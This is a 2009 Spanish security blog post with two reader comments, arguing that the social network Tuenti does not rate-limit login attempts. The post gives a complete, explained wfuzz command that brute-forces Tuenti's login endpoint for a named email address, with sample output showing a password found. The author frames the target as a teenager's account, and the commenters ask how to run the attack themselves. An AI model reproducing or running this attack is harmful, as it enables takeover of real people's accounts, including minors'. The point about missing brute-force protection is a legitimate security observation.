BackUp SeguridadBlanca

Backup Oficial de SeguridadBlanca.Org

sábado, 18 de julio de 2009

Captcha y Mas Sistemas en Web 2.0

Me llama la atención como los webmails y algunos otros servicios protegen a los usuarios de ataques de fuerza bruta mediante distintas medidas como son el bloqueo de cuentas, de direcciones IP o mediante el uso de CAPTCHAs. En cambio, otras aplicaciones de gran difusión como son las redes sociales, parecen no preocuparles este problema, pese a que el contenido puede ser muy sensible y los usuarios tienen zonas privadas de mensajes.

Aprovechando la reflexión, he comprobado como Tuenti no limita estas peticiones con la estupenda herramienta de Edge-Security: wfuzz.

El siguiente ejemplo muestra su ejecución para lanzar el comando (lo siento para los amantes de las ventanitas) contra este fabuloso portal

$ python wfuzz.py -c -z file -f wordlists/common.txt --hc 200 -d"email=securik@gmail.com&input_password=FUZZ&timezone=1" "https://www.tuenti.com/?m=Login&func=do_login"
Lo único que nos haría falta es una buena lista de palabras (o todas las posibles de 8 caracteres, total, es gratis) y la cuenta de correo del teenager a atacar.

Los argumentos son los siguientes:
  • -c colorea la salida para una fácil visualización
  • -z file indica que se pasará un fichero como diccionario
  • -f wordlist/common.txt es el archivo con las contraseñas a probar (aseguraros que tiene CristianoRonaldo como una de ellas)
  • --hc 200 solicita que todo lo que devuelva un error 200 no sea mostrado
  • -d especifica los parámetros que serán enviados como POST.
  • FUZZ indica donde se hará la rotación de palabras, en este caso en el campo "input_password"
Si tenemos suerte se debería mostrar una línea de este tipo, donde "ecurity" es la contraseña válida:
Target: https://www.tuenti.com/?m=Login&func=do_login
Payload type: file

Total requests: 948
=================================
ID Response Lines Word Request
==================================

00947: C=302 0 L 0 W "ecurity"
La siguiente captura muestra la ejecución completa:


En cambio Facebook bloquea la cuenta y exige se haga un reinicio de contraseña, enviando un aviso al correo electrónico.





Saludos
Dr.White
Publicado por en
Etiquetas: , ,

2 comentarios:

  1. poy8 de agosto de 2009, 14:48

    Oye tengo una duda tengo el programa y quisiera probarlo, una es si quiero que pase un diccionario osea que valla probando todas las contraseñas de letras posibles¿tengo que descargar un fichero como diccionario o algo asi?y otra es que explicases que comandos hay que poner exactamente, quizas es pedir mucho pero bueno

    ResponderEliminar
  2. Anonymous8 de agosto de 2009, 16:32

    he puesto elmismo comando que pusiste y dice que no lo reconoce como archivo o programa ejecutable :S

    ResponderEliminar

Suscribirse a: Enviar comentarios (Atom)